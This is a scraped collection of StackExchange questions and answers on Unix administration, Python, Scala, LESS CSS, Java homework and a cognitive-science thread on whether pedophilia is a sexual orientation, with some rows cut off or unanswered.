printed amounts is $sumecho This would be easier altogether as an awk script. Again, untested.awk ' $9 > 999 && $5 ~ /^[N[YCEJ]]$/ { print $1, $2, $5, $3, $9; sum += $9; } END { print \nThe sum is all printed amounts is sum }' <$1 |
_cogsci.587 | There are some different claims being made that pedophilia is a sexual orientation rather than a mental disorder.At the moment there seems to be a growing group of psychologists advocating that pedophilia is, or at least should be considered a sexual orientation rather than a mental disorder.For example:GOOD: You're a member of a growing group of psychologists who say pedophilia should be considered a sexual orientation. Why?Quinsey: Part of the definition of pedophilia is a person has a preference for a particular kind of partner. [...] pedophiles, unlike other men, show substantial sexual interest in prepubescent children. As far as we knowand many people have triedthese sexual interests are not modifiable by any method thats been tried yet. So it appears like pedophilia is a sexual orientation. [...] You also cant modify that interest; its stable through adulthood, just like pedophilia.Another example:Pedophiles are not simply people who commit a small offence from time to time but rather are grappling with what is equivalent to a sexual orientation just like another individual may be grappling with heterosexuality or even homosexuality, emphasized Van Gijseghem.True pedophiles have an exclusive preference for children, which is the same as having a sexual orientation. You cannot change this persons sexual orientation. He added, however: He may however remain abstinent.There is also an advocacy/support group for people attracted to minors, B4UACT, who state in a section from their website (emphasis mine):Why do you say that minor-attracted people are stereotyped?Popular beliefs about minor-attracted people are not supported by the evidence. Research shows that they are no more violent or aggressive than the general population, nor do they suffer from psychopathology or personality disorders. As a group, they do not share any particular characteristics or behaviors other than their feelings of attraction.As I understand things mental disorders tend to have observable associated symptoms, while a sexual orientation would not as it is just an instinctive attraction (in the general sense of the term).Are there studies that suggest that pedophilia is a sexual orientation? Do traits typically associated with a mental disorder apply to pedophilia? | Is pedophilia a sexual orientation or a mental disorder? | terminology;reference request;abnormal psychology;psychiatry;physical attraction | Before trying to give any sort of answer, it is important to address a common misconception. In popular culture, the terms child-molester and pedophile are often equated. Scientifically, they are not at all the same. The approximate scientific definition for a pedophile is:an individual that has an unwavering sexual attraction to prepubescent children similar to attraction heterosexual men have for womenThis means that a pedophile might or might not molest children, and a child-molester might or might not be a pedophile. Further, implicit in this definition is a close resemblance to a sexual orientation, and if you want a through and careful discussion of this (much better than my answer) then read:Senta, M.C (2012) Is Pedophilia a Sexual Orientation? Archives of Sexual Behavior 41(1): 231-236.Now, the actually relevant scientific discussion (as opposed to merely a semantic distinction) is threefold: (1) can pedophilia be considered a choice in the legal sense? (2) what causes it? (3) can it be treated?Note that for what we typically consider sexual orientations, questions (1) and (3) have clear answers: no, and no. However, for mental disorders, all permutations of answers to (1) and (3) is possible. Thus, answering these questions does not let you clear up semantic ambiguity.To start with question (2): in broad strokes Blanchard, et al. (1999) and Cantor, et al. (2004) suggest that pedophilia has a prenatal cause. For question (3) there has been no evidence to suggest that pedophilia can be treated or cured, much like how you cannot cure homosexuality. This lead to Van Gijseghem expert testimony before the Canadian Parliment's Standing Committee on Justice and Human Rights that you quote from in your question. He concludes that pedophilia cannot be 'cured' through penal intervention. However, it is possible for a pedophile to abstain from becoming a child-molester. This leaves us question (1), the legal part of this. In Canada, being a pedophilia is not a crime, but molesting children is a crime. The status of pedophilia as a mental disorder or sexual orientation is irrelevant to this since both mental status and sexual orientation are protected by Canadian law as long as they do not infringe on other's rights. To help pedophiles abstain from molesting children there is the Circles of Support and Accountability (CoSA) program (note: it deals with all kinds of sexual offenders, not just child-molesters). This program is aimed to manage and not 'cure'. Wilson et al. (2007, 2009) have shown that CoSA produces dramatic decrease in re-offence rates for sexual offenders. |
_unix.350714 | I'm trying to use this old technology called USB ;) I call it old because all the tutorial that I find on-line deal with wireless printers or IP ones. The man for lpadmin is very unclear how to go about adding a USB printer, and so I come here for some help. When I print dmesg I can see my printer being detected over USBusb 1-1.3: new high-speed USB device number 7 using dwc_otgusb 1-1.3: New USB device found, idVendor=03f0, idProduct=2b17usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3usb 1-1.3: Product: HP LaserJet 1020usb 1-1.3: Manufacturer: Hewlett-Packardusb 1-1.3: SerialNumber: FN0JW5Eusblp 1-1.3:1.0: usblp0: USB Bidirectional printer dev 7 if 0 alt 0 proto 2 vid 0x03F0 pid 0x2B17My question isHow can I add it, because it seams this command is adding the printer but there is no communication, and I'm not sure if I have malformed the USB part:lpadmin -p HP1020 -E -v usb://Hewlett-Packard/HP%20LaserJet%201020?serial=FN0JW5E -m lsb/usr/hplip/HP/hp-laserjet_1020-hpijs.ppdAlso, what would be the simplest command to check if I can communicate with the printer. I don't need to print anything, just to be able to see there is communication. This will help me debug the drivers. | How to add a USB printer using lpadmin | usb;printer;lp | null |
_softwareengineering.301092 | In a current project of mine, I have decided to not put any significant amount of code in __init__.py files, simply because I don't like them. In my head, an __init__.py file is just there to inform Python that the folder is a module. I keep forgetting that they might contain lots of code just like any other Python module.In this project I have decided to create a main submodule whenever I'm tempted to put significant amounts of code in an __ini__.py file, then I import the main submodule in __init__.py and replace the module.For example, say I have a module named alpha:alpha/ __init__.pyAnd I want to put a few constants and helper methods under the alpha module. Instead of putting the code into __init__.py I create a new module called (for example) main:alpha/ __init__.py main.pyThen I put my stuff in that module. Then I just put this into __init__.py:import sysimport alpha.mainsys.modules[alpha] = alpha.mainNow I can put stuff into alpha/main.py:author = John Hancockmaintainer = John HancockAnd access it like this:import alphaprint(alpha.maintainer)It works perfectly, and I'm loving that I don't have to edit __init__.py files anymore.However, this kind of magic always gives me the feeling that a more experienced Python ninja would chop me in the face if he caught me.This convention seems completely innocuous to me, but could it come back to bite me in the ass later? Are there any pitfalls I should look out for? | Are there any pitfalls when replacing a Python module using sys.modules? | python;python 3.x | An alternative that doesn't abuse python so much, is to put the following in your __init__.pyfrom .main import *Its not quite the same as replacing the module, but I would suspect it will work in most cases.However, I would take the theory that you shouldn't do it. Pretending that your code is in the root of the alpha module when it is isn't just confusing. |
_unix.42190 | I have an unmanaged dedicated server that I administer, running CentOS. Recently when I reboot the server, I am unable to use SSH. Both times this has happened the server host has determined the issue and explained it like this:Please check now - I'm not sure how and why but eth0 and eth1 were both active on boot (there should only be one). I've fixed this and rebooted the server which came up cleanly with network connectivity. If you have any application that could be making this change, kindly disable the same as well.So in order for me to check into this myself, I am wondering where to look in order to see the settings he is describing there? That way I can configure it myself and try and determine if any programs are changing this.Note: I have been using the 'reboot' command, could this be resetting the ONBOOT status? | How do I configure which ethernet connections are active on boot? | centos;ethernet;startup | cd into /etc/sysconfig/network-scripts. In there, you will find ifcfg-eth0 and ifcfg-eth1. Edit them, and set the ONBOOT line's values to yes and no, respectively. (Or vice versa, if it's eth1 you'd rather come up on boot.)If you have to prevent the kernel from even attempting to touch the Ethernet hardware, you can pound out the eth1 line in /etc/modprobe.conf. Something like this:#alias eth1 e1000The e1000 bit will be the driver name; it varies depending on the hardware in the machine. You'll find the line without the # at the start; add it.A better solution, if simply touching this hardware is a problem, is to remove access to it entirely at the hardware/VM level. If it's a VM, you'd remove it from the VM configuration. If it's real hardware, you'd disable the second Ethernet interface in the machine's firmware. (BIOS, EFI...) |
_unix.344899 | I've recently upgraded my PostgreSQL Server from 9.2 to 9.4. With these changes, I've updated a PostgreSQL Utilities RPMs POM.xml from<groupId>org.codehaus.mojo</groupId><artifactId>rpm-maven-plugin</artifactId><require>postgresql92-postgresql</require>to<groupId>org.codehaus.mojo</groupId><artifactId>rpm-maven-plugin</artifactId><require>rh-postgresql94-postgresql</require>and the new RPMs are installed as a pre-requisite to installing the utilities package.What's the best way to yum-remove the old RPMs? (postgresql92-postgresql)Should I just add it to the post-install script or can I do this via POM.xml as I have done to install the RPMs? | Post-install Yum Remove Dependency | rhel;yum;rpm | null |
_softwareengineering.346841 | what would be the more idiomatic way to recover from a failed futureval fut: Future[Option[Int]] = Future.failed(new RuntimeException(Hi, I have failed))case class ApplicationException(msg: String) extends RuntimeException(msg)al take1Fut = fut.recover{ case e: RuntimeException => throw ApplicationException(I have some business value)}val take2Fut = fut.transform( identity, {case e: RuntimeException => throw ApplicationException(I have some business value)})val take3Fut = fut.fallbackTo( Future.failed(ApplicationException(I have some business value)))Or is there some other, more idiomatic way? Personally, I favor the take1Fut | iodiomatic future failures in scala | scala;idioms;failure | null |
_unix.102170 | I am able to bind Ctrl-Alt-[a-z] using M-C-a, M-C-b etc.However, when I attempt to bind Ctrl-Alt and a number key I get:.tmux.conf: 45: unknown key: M-C-0Any idea why? I'm running tmux ver 1.7Related: How to bind Ctrl-Alt-b as the prefix of tmux? | How can I bind Ctrl-Alt-[0-9] in Tmux? | tmux | The problem is that tmux does not expect a control0.In key_string_lookup_string, it strips off the modifiers, and then (because you have the control modifier) tries to convert it from something like ^A (see source code). But ASCII digits range from 48 to 57, and you can see from the code that tmux will not accept a digit, returning KEYC_UNKNOWN (a failure):/* Convert the standard control keys. */if (key < KEYC_BASE && (modifiers & KEYC_CTRL) && !strchr(other, key)) { if (key >= 97 && key <= 122) key -= 96; else if (key >= 64 && key <= 95) key -= 64; else if (key == 32) key = 0; else if (key == 63) key = KEYC_BSPACE; else return (KEYC_UNKNOWN); modifiers &= ~KEYC_CTRL;} |
_unix.322761 | I have a 7gb text fileI need to edit n first lines of that file (let us assume n=50)I want to do this the following way:head -n 50 myfile >> tmpvim tmp # make necessary editssubstitute first 50 lines of myfile with the contents of tmprm tmphow do I complete the third step here? better solutions to the general problem are also appreciatednote: there is no GUI in this environment | overwrite first n lines of a file | files | man tail says: -n, --lines=[+]NUM output the last NUM lines, instead of the last 10; or use -n +NUM to output starting with line NUMtherefore you can dotail -n +51 myfile >>tmp |
_unix.365118 | How can i connect to my desktop version of linux from windows, i need graphic mode ? | Remote desktop connection to linux from windows | linux;remote desktop | null |
_softwareengineering.267576 | My question is related to MVC design pattern and Razor Syntax introduced by Microsoft. While learning MVC design pattern I was told that the idea is based upon a principle known as Separation of Concerns. But Razor Syntax allows us to use C# in Views directly. Isn't this intersection of concerns? | If MVC is Separation of Concerns then why was Razor Syntax introduced? | c#;asp.net mvc;separation of concerns;razor | You are conflating the Razor syntax with separation of concerns.Separation of concerns has to do with how you structure your code.Being able to use C# in views doesn't prevent that. It has nothing to do with separation of concerns as such.Sure, you can structure the code in your view to not comply with separation of concerns, but what about C# code that is used for display purposes only? Where would that live? |
_softwareengineering.190240 | I heard that the context analysis diagram has different levels. I couldn't find this in .Net, but I have seen that a DFD has different levels. Do context diagrams have any levels (level0, level1, level2)? If yes, please suggest some examples. | Do context diagrams have levels? | diagrams;data flow diagram | The answer depends upon what type of Context Diagram you are referring to.System Context Diagrams have a single layer only. So the answer is No.From the Wikipedia article:This diagram is the highest level view of a system. IDEF0 Top Level Context Diagrams have a single top-level context diagram and then have optional 'child' diagrams below that. So the answer here would be Yes.The IDEF0 process starts with the identification of the prime function to be decomposed. This function is identified on a Top Level Context Diagram, that defines the scope of the particular IDEF0 analysis. ... From this diagram lower-level diagrams are generated. |
_unix.90126 | How do I turn off SMTP AUTH PLAIN for Citadel 8.20 on Slackware 14.0?If I set up postfix to handle SMTP would this allow me to not have SMTP auth plain enabled | How to disable SMTP auth plain for Citadel 8.20 on Slackware 14.0? | email;slackware;smtp;slackbuilds | null |
_unix.4708 | There are 3 tiling modes in KDE: spiral, columns and floating. What does each do and how do make them work for me? For example, spiral seems to cut my screen in half then the next half another way. Is it possible to adjust it so that it's like 2/3? I don't understand how to make use of float. Perhaps someone could explain what each is for (or one for each answer) and how they can be used and tuned. | What is the difference between the various tiling modes in KWin, and how do I use them? | kde;window manager;kwin;tiling wm | null |
_unix.360843 | If for example I have compiled a simple C program that uses GTK 3 on a machine running Ubuntu, will I be able to run it on other Linux flavours?Note: My actual questions is Should I label my compiled program for Linux or just Ubuntu?eg. Should I label my downloads page asWindows program.exeLinux programMacintosh program.apporWindows program.exeUbuntu < Version 17.04 programMacintosh program.app | Compiled Executable | compiling;c;gtk;compatibility;software distribution | Linux executables are not specific to a Linux distribution. But they are specific to a processor architecture and to a set of library versions.An executable for any operating system is specific to a processor architecture. Windows and Mac users don't care as much because these operating systems more or less only run on a single architecture. (OSX used to run on multiple processor architectures, and OSX applications were typically distributed as a bundle that contained code for all supported processor architectures, but modern OSX only runs on amd64 processors. Windows runs on both 32-bit and 64-bit Intel processors, so you might find 32-bit and 64-bit Windows executables.)Windows resolves the library dependency problem by forcing programmers to bundle all the libraries they use with their program. On Linux, it's uncommon to do this, with the benefit that programmers don't need to bundle libraries and that users get timely security updates and bug fixes for libraries, but with the cost that programs need to be compiled differently for different releases of distributions.So you should label your binary as Linux, 64-bit PC (amd64), compiled for Ubuntu 17.04 (or 32-bit PC (i386) if this is a 32-bit executable), and give the detail of the required libraries. You can see the libraries used by an executable with the ldd command: run ldd program. The part before the => is what matters, e.g. libgtk-3.so.0 is the main GTK3 library, with version 0 (if there ever was a version 1, it would be incompatible with version 0, that's the reason to change the version number). Some of these libraries are things that everyone would have anyway because they haven't changed in many years; only experience or a comparison by looking at multiple distributions and multiple releases can tell you this. Users of other distributions can run the same binary if they have compatible versions of the libraries. |
_unix.167326 | Can we use semicolon to separate a background job from the following one?$ nohup evince tmp1.pdf &; nohup evince tmp.pdf &bash: syntax error near unexpected token `;' | Using semicolon to separate a background job from the following one? | background process | null |
_codereview.102586 | I'm learning about using LESS and wanted to get anyone's input on if I'm using the concepts, syntax, etc. correctly.I know this might seem subjective and not the correct place to post, so please let me know if there is a more appropriate place to do this. LESS code.centered(@position: inline, @width: 100%){ margin-left: auto; margin-right: auto; width: @width; display: @position;}.table-center(@width: 100%){ width:@width; display:table!important; text-align:center; &:nth-child(1) { display:table-cell; } }.clear-border-radius{ border-radius: initial; -webkit-border-radius: initial; -moz-border-radius: initial;}.shadowbox-format(@caption-font-size, @button-font-size, @shadowbox-margin) { display: block; position: absolute; min-height: 85px; width: 60%; margin: @shadowbox-margin; left: 20%; .shadowbox-caption { font-size: @caption-font-size; .table-center; } .shadowbox-button-wrapper { width: 35%; margin: 26px auto 0; & > a { .clear-border-radius; font-size: @button-font-size; } }}.home-slide-container{ img{ .centered(block); height:auto; }}.callout-header{ text-align:center; width: auto; margin: 40px auto 0; border-bottom: 1px solid #9e9e9e; padding: 0 0 30px; @media (max-width: @screen-xs-max){ width: 90%; } @media (min-width: @screen-sm-min){ width: 60%; } span{ font-size: 24px; }} .carousel-shadowbox { text-transform: uppercase; color:#000; background-color:rgba(255,255,255,0.4); @media (max-width: @screen-xs-max) { background-color: white; opacity:1.0; .shadowbox-caption{ .table-center; span{ font-size: 16px; font-weight: 100; } } } @media (min-width: @screen-sm-min) { .shadowbox-format(20px, 16px, -91px auto 0); } @media (min-width: @screen-md-min) { .shadowbox-format(22px, 18px, -96px auto 0); } @media (min-width: @screen-lg-min) { .shadowbox-format(24px, 20px, -102px auto 0); } } .callout{ position:relative; margin-top: 5%; img{ @media (max-width: @screen-xs-max){ margin: 0 auto; } } .callout-text-container{ padding:3px; @media (min-width: @screen-sm-min) and (max-width: @screen-sm-max) { bottom:22px; } min-height: 200px; .callout-title{ padding-top: 5px; text-transform: capitalize; font-size: 22px; display:table; width:100%; text-align:center; margin-bottom: 25px; span{ display: table-cell; } } .callout-body{ font-size: 15px; padding:8px; text-align:justify; } .button-wrapper{ padding: 10px; a{ text-transform: capitalize; border-bottom: 4px solid #cb2b06; background-color: #e6431e; .clear-border-radius; font-size: 16px; } } } } | LESS CSS, including support for shadowboxes | beginner;css;less css | null |
_unix.165956 | On my debian laptop I installed kernel 3.14 so I have the alx driver so my ethernet works, I originally had the 3.2 kernel (Debian 7.7). AFter installing the new kernel, gnome3 went back to the failed to start properly-mode and startx didnt find the fglrx module .(Is that a kernel compatibility issue? Can I install lower kernels than 3.14 via apt-get? | Kernel 3.14 not working with ATIProprietary fglrx? | debian;kernel;amd;fglrx | FGLRX has very poor performance (among other issues, which may include kernel compatibility issues with newer kernels). Heed my advice: You need to use the Open-Source Radeon drivers.https://wiki.debian.org/AtiHowToI'm running Kernel 3.14+ on an ATI Radeon 5770HD with the Open-Source drivers.The solution is not to downgrade your kernel. Download the Open-Source drivers via apt-get from the provided link. The XServer should pretty much take care of itself when you install the new packages. |
_webapps.22392 | I am new to Trello and would have several tasks that I need to do regularly. Is there a way in the due date or check list to do this? | How can I create a recurring task in check lists? | trello | null |
_unix.212646 | I know this question is not obscure, as it is asked here keep updating (and duplicated here).What I'm trying to achieve is a bit different. I don't like the idea of my prompt rewriting a file every ls I type (history -a; history -c; history -r).I would like to update the file on exit. That's easy (actually, default), but you need to append instead of rewriting:shopt -s histappendNow, when a terminal is closed, I would like to make all others that remain open to be aware of the update.I prefer to do this without checking via $PS1 on every command that I type. I think it would be better to capture some sort of signal. How would you do that? If not possible, maybe a simple cronjob?How can we solve this puzzle? | Update bash history on other terminals when exiting one terminal | bash;shell;command history;signals | Creative and involving signals, you say? OK:trap on_exit EXITtrap on_usr1 USR1on_exit() { history -a trap '' USR1 killall -u $USER -USR1 bash}on_usr1() { history -n}Chuck that in .bashrc and go. This uses signals to tell every bash process to check for new history entries when another one exits. This is pretty awful, but it really works.How does it work?trap sets a signal handler for either a system signal or one of Bash's internal events. The EXIT event is any controlled termination of the shell, while USR1 is SIGUSR1, a meaningless signal we're appropriating.Whenever the shell exits, we:Append all history to the file explicitly.Disable the SIGUSR1 handler and make this shell ignore the signal.Send the signal to all running bash processes from the same user.When a SIGUSR1 arrives, we:Load all new entries from the history file into the shell's in-memory history list.Because of the way Bash handles signals, you won't actually get the new history data until you hit Enter the next time, so this doesn't do any better on that front than putting history -n into PROMPT_COMMAND. It does save reading the file constantly when nothing has happened, though, and there's no writing at all until the shell exits.There are still a couple of issues here, however. The first is that the default response to SIGUSR1 is to terminate the shell. Any other bash processes (running shell scripts, for example) will be killed. .bashrc is not loaded by non-interactive shells. Instead, a file named by BASH_ENV is loaded: you can set that variable in your environment globally to point to a file with:trap '' USR1in it to ignore the signal in them (which resolves the problem).Finally, although this does what you asked for, the ordering you get will be a bit unusual. In particular, bits of history will be repeated in different orders as they're loaded up and saved separately. That's essentially inherent in what you're asking for, but do be aware that up-arrow history becomes a lot less useful at this point. History substitutions and the like will be shared and work well, though. |
_unix.257137 | I can break this down into two subcomponents:Why/how does this automated mounting procedure create (and destroy) it's own mounting point?Why do I have to manually create my own mount point when doing it myself (or how can I jump on the automated way of doing it)?I am not clear on the exact process that is going on when I insert a USB key into the system. I see there is a lot going on...for example, inserting an old USB2 1GB stick:[76187.152010] usb 3-6: new high-speed USB device number 18 using ehci-pci[76187.285314] usb 3-6: New USB device found, idVendor=1221, idProduct=3234[76187.285317] usb 3-6: New USB device strings: Mfr=1, Product=2, SerialNumber=3[76187.285319] usb 3-6: Product: Flash Disk[76187.285321] usb 3-6: Manufacturer: USB2.0[76187.285323] usb 3-6: SerialNumber: 100000000000099E[76187.285627] usb-storage 3-6:1.0: USB Mass Storage device detected[76187.285704] scsi host27: usb-storage 3-6:1.0[76188.285460] scsi 27:0:0:0: Direct-Access USB2.0 Flash Disk 2.60 PQ: 0 ANSI: 2[76188.285731] sd 27:0:0:0: Attached scsi generic sg11 type 0[76188.286201] sd 27:0:0:0: [sdk] 2048000 512-byte logical blocks: (1.04 GB/1000 MiB)[76188.291250] sd 27:0:0:0: [sdk] Write Protect is off[76188.291255] sd 27:0:0:0: [sdk] Mode Sense: 0b 00 00 08[76188.292333] sd 27:0:0:0: [sdk] No Caching mode page found[76188.292337] sd 27:0:0:0: [sdk] Assuming drive cache: write through[76188.296951] sdk: sdk1[76188.300321] sd 27:0:0:0: [sdk] Attached SCSI removable diskand that it get's mounted thusly:/dev/sdk1 on /media/madivad/5859-77E7 type vfat (rw,nosuid,nodev,uid=1000,gid=1000,shortname=mixed,dmask=0077,utf8=1,showexec,flush,uhelper=udisks2)Is it something in the automount process that creates (and later destroys) a directory for the mounting process? Am I able to identify something on the mount command line to create this directly as part of the process and later remove it on umount?Is this something that you would normally automate into a script to remember to first create and mount something and then later umount it and remove the directory? I suppose a part of the process that annoys me is that I end up leaving directories that I forget to remove, especially when I'm testing things. I would like that (for example) when I mount something:sudo mount /dev/sdk1 /mnt/usbkey1gthat if the mount point is already created and/or in use that I get a warning, but more importantly, if it's NOT there, then create it on the fly. Likewise, have it removed when I umount the key.I have Ubuntu 14.04 LTS installed in both Desktop and Server flavours.I have asked the question here as opposed to AU primarily because I am asking this independent of the actual OS and with reference to Linux generally but as it applies to me. Feel free to have this migrated to AU if it is more appropriate there.Cheers. | Understanding the automated mounting of USB Thumbdrive and doing it myself | ubuntu;mount;usb drive | null |
_cogsci.12248 | I've recently read an article about Generation Z, early 20 year olds born after 1995 in the workforce (similar to this one). The article suggests that unlike previous generation, where ambigious goals may inspire 30 somethings to do their best work, the 20 year olds from generation Z prefer to have things broken down into a very clear chunks. An example may be in order:Compare the sales figures reportVersus: We need a sales report for investor meeting by Friday morning, get sales figures from Angela, have Bill help with graphics and verify figures with Jeff. If you are late, we will penalize you. The article continues to state that if faced with the first scenario, a 20 something would get frustrated and will start seeking another job, while more detailed information would help them rise up to the task. Why some people are uncomfortable and unproductive when faced with ambiguous or uncertain goals/challenges? | Why some people do not perform well with ambiguity and uncertainty? | cognitive psychology;social psychology;behaviorism | I'm not 100% sure if this is what you were intending to ask, because your initial opening was about generation Z (which is at the large cultural level) while on the other hand your question written in bold seemed to be geared towards the individual. I have tried incorporating both parts into this answer.In essence I could not tell between which of the two concepts in psychology you were interested in: Uncertainty Avoidance or Proactive Personality (the lack of which is what you describe).There is an intersection between the two concepts. You may start here in case you want to look deeper into the latter. Background to AnswerOf particular interest in this study is the macro dimension of uncertainty avoidance measured at an individual level. Cultures high on uncertainty avoidance are risk adverse. Individuals in these cultures prefer stability in their lives and careers. They want their environment to be predictable. To foster compliance among their members, cultures high in uncertainty avoidance structure behavior through such mechanisms as laws, religion or customs. Vague situations are avoided in high uncertainty avoidance cultures, and group norms and rules reduce ambiguity. Individuals tend to attach themselves to the dominant cultural group and comply with its expectations (Hofstede, 1980). However, there has been a suggestion in organizational research that rather than the more passive attachment to the dominant group, some cultures actively try to reduce uncertainty by controlling their future environment. For example, Schneider and DeMeyer (1991) suggested that managers in high uncertainty avoidance cultures are likely to engage in proactive behaviors in an attempt to adapt to a dynamic environment. Geletkanycz (1997) also found that executives who are high on uncertainty avoidance in their cultural background seek strategic solutions that respond to dynamic environments. That is, they engage in adaptation as a way of reduce risk. Because of this alternative way of adapting to uncertainty, Geletkanycz (1997) called for further research to examine the issue that not all individuals react to risk by adhering to the norm but rather adjust to position themselves in a safer position in the future.Research has also identified that individuals high on uncertainty avoidance make choices for uncertain outcomes that involve gains (Ladbury & Hinz, 2009). For example, individuals can be induced to volunteer for treatment in a randomly assigned process if they are offered monetary compensation for showing up (Harrison, Lau & Rutstrom, 2009). An individuals income can also have an influence on uncertainty avoidance and outcomes. For example, Yang-Ming (2008) found that as income increases, individuals high on uncertainty avoidance were more willing to take risks.Relation between Uncertainty Avoidance and Productivity (Individual Level)In her research with business executives, Geletkanycz (1997) hypothesized that top managers whose background cultures were high on uncertainty avoidance would be uncomfortable with uncertainty. Because of their need for structure, she predicted that they would be resistant to change. They would avoid taking action to alter their situation. However, what she found in her research was that managers whose background cultures were high in uncertainty avoidance reduced their feeling of uncertainty by adapting to the environment. She surmised that in the dramatic changes related to technology and globalization, it was safer and less risky for these executives to adjust to the changing environment rather that inflexibly hanging on to what is known.Relation between Uncertainty Avoidance and Productivity (Macro Level)The cultural value of uncertainty avoidance influenced whether Irish firms were successful as compared to German firms (Rauch, Frese, & Sonnentag, 2000). Ireland scores low on uncertainty avoidance in contrast to Germany which is high on the value. It was found that successful small business owners in Ireland did not plan. Rather, customers in that culture valued flexibility and quick solutions to problems. In contrast, German business owners were more successful when they did plan. It was proposed by these researchers that in such high uncertainty avoidance cultures, it was expected that individuals engage in careful planning to reduce risk by attempting to control future events. However, the results were more consistent with the interpretation made by Schneider and DeMeyer (1991) in that they found that planning is culturally appropriate, and this detailed planning resulted in a successful relationship with customers who also valued planning (Rauch, Frese, & Sonnentag, 2000).Primary Source:The Two Faces of Uncertainty Avoidance: Attachment and AdaptationDavid S. Baker and Kerry D. Carson University of Louisiana at LafayetteCitations within SourceCultures consequences: International differences in work-related values. Hofstede, G. (1980). Newbury Park, CA: Sage.Interpreting and responding to strategic issues: The impact of national culture. Schneider, S. C., & DeMeyer, A. (1991). Strategic Management Journal, 12(4), 307-320.Uncertainty avoidance influences choices for potential gains but not losses. Ladbury, J., & Hinsz, V. B. (2009). Current Psychology, 28(3), 187-193.Corporate cash holdings, uncertainty avoidance, and the multinationality of firms. Ramirez, A., & Tadesse, S. (2009).International Business Review, 18(4), 387-403. |
_webapps.79919 | I have a list I created and I want to add my account a member of the listed I created. I have tried looking for an answer online but can't find one. | How do I add my Twitter feed to my own list? | twitter | null |
_unix.289074 | I'm on Ubuntu Mate 16.04 using terminator as my terminal. And using ZSH version 5.1.1. I'd rather change the keybinding to the left arrow key to emulate fish in a way. Anyone know how? | How to change the key for autocompletion in ZSH? | zsh;keyboard shortcuts;autocomplete | null |
_softwareengineering.200709 | There are some (quite rare) cases where there is a risk of:reusing a variable which is not intended to be reused (see example 1),or using a variable instead of another, semantically close (see example 2).Example 1:var data = this.InitializeData();if (this.IsConsistent(data, this.state)){ this.ETL.Process(data); // Alters original data in a way it couldn't be used any longer.}// ...foreach (var flow in data.Flows){ // This shouldn't happen: given that ETL possibly altered the contents of `data`, it is // not longer reliable to use `data.Flows`.}Example 2:var userSettingsFile = SettingsFiles.LoadForUser();var appSettingsFile = SettingsFiles.LoadForApp();if (someCondition){ userSettingsFile.Destroy();}userSettingsFile.ParseAndApply(); // There is a mistake here: `userSettingsFile` was maybe // destroyed. It's `appSettingsFile` which should have // been used instead.This risk can be mitigated by introducing a scope:Example 1:// There is no `foreach`, `if` or anything like this before `{`.{ var data = this.InitializeData(); if (this.IsConsistent(data, this.state)) { this.ETL.Process(data); }}// ...// A few lines later, we can't use `data.Flows`, because it doesn't exist in this scope.Example 2:{ var userSettingsFile = SettingsFiles.LoadForUser(); if (someCondition) { userSettingsFile.Destroy(); }}{ var appSettingsFile = SettingsFiles.LoadForApp(); // `userSettingsFile` is out of scope. There is no risk to use it instead of // `appSettingsFile`.}Does it look wrong? Would you avoid such syntax? Is it difficult to understand by beginners? | Is the usage of internal scope blocks within a function bad style? | c#;coding style;language features;scope | If your function is so long that you cannot recognize any unwanted side effects or illegal reuse of variables any more, then it is time to split it up in smaller functions - which makes an internal scope pointless.To back this up by some personal experience: some years ago I inherited a C++ legacy project with ~150K lines of code, and it contained a few methods using exactly this technique. And guess what - all of those methods were too long. As we refactored most of that code, the methods became smaller and smaller, and I am pretty sure there are no remaining internal scope methods any more; they are simply not needed. |
_codereview.7376 | I'm learning java, although because of work I didn't had much time to go to classes. We had a final work to do but since I'm more familiarised with python I'm not sure if I'm doing java correctly...I'm also a bit confused about attributes and constructors, I don't really understand the use of it.For this work we have to do a server class and a client class. We have 4 files, one with times (in seconds) and points for bike female and male, and others with times and points run female and male. We then have a times file where each athlete have the time (minutes) for bike and run. We need to calculate the points for each time with linear interpolation, and then sort then, to see which athlete was the best one.Where's what I've done at the server class:import java.io.File;import java.io.FileNotFoundException;import java.io.FileReader;import java.util.ArrayList;import java.util.Scanner;public class Scorer {private String bike;private String run;private ArrayList<ArrayList<Integer>> athletes;private boolean gender;public Scorer(String bikeF, String runF, ArrayList<ArrayList<Integer>> athletes) { this.bike = bikeF; this.run = runF; this.athletes = athletes; }public Scorer(ArrayList<ArrayList<Integer>> athletes, boolean gender) { this.athletes = athletes; this.gender = gender; if (gender == true) { this.bike = bike + F.tab; this.run = run + F.tab; } else { this.bike = bike + M.tab; this.run = run + M.tab; }}public int[][] valsProximos(String table, ArrayList<ArrayList<Integer>> athletes, int n) throws FileNotFoundException { // compare file times and points with array to find distances and points closest to calculate linear interpolation Scanner tables = new Scanner (new FileReader(table)); int [][] tabPoints = new int [9][2]; // this case, each column has a meaning, 1 athlete 2 points (if equals) 3 athlete 4 difference between times 5 max time 6 max points 7 athlete 8 difference between times 9 min time 10 min points int [][] values = new int [athletes.size()][10]; for (int i=0; i<tabPoints.length;i++) { for (int j =0;j<tabPoints[0].length;j++) tabPoints[i][j]= tables.nextInt(); } for (int i=0; i<athletes.size(); i++) { for (int j=0; j<tabPoints.length; j++) { if (athletes.get(i).get(n) == tabPoints[j][0]) { values[i][0] = athletes.get(i).get(0); values[i][1] = tabPoints[j][1]; } else { if (tabPoints[j][0] > athletes.get(i).get(n)) { // calculate difference between each time and the time in the table int dif = tabPoints[j][0] - athletes.get(i).get(n); if (values[i][2] != athletes.get(i).get(0)) { values[i][2] = athletes.get(i).get(0); values[i][3] = dif; values[i][4] = tabPoints[j][0]; //maxTime values[i][5] = tabPoints[j][1]; // maxPoint } else if (dif < values[i][3]) { values[i][3] = dif; values[i][4] = tabPoints[j][0]; values[i][5] = tabPoints[j][1]; } } else { int dif1 = athletes.get(i).get(n) - tabPoints[j][0]; if (values[i][6] != athletes.get(i).get(0)) { values[i][6] = athletes.get(i).get(0); values[i][7] = dif1; values[i][8] = tabPoints[j][0]; // minTime values[i][9] = tabPoints[j][1]; // minPoint } else { if (dif1 < values[i][7]) { values[i][7] = dif1; values[i][8] = tabPoints[j][0]; values[i][9] = tabPoints[j][1]; } } } } } } return values;}public double intLinear(int maxTime, int time, int minTime, int maxPoint, int minPoint) { // calculate points given time acRunding to linear interpolation double intLinear = (double)(maxTime - time)/(maxTime - minTime) * minPoint + (double)(time - minTime)/(maxTime - minTime) * maxPoint; // round to closest number double athletePoint = (double)Math.round(intLinear); return athletePoint;}public int[][] Score(int [][] valBike, int [][] valRun, ArrayList<ArrayList<Integer>> athletes) { int [][] punctuate = new int [athletes.size()][4]; for (int i=0; i<valBike.length; i++) { if (athletes.get(i).get(0) == valBike[i][0]){ 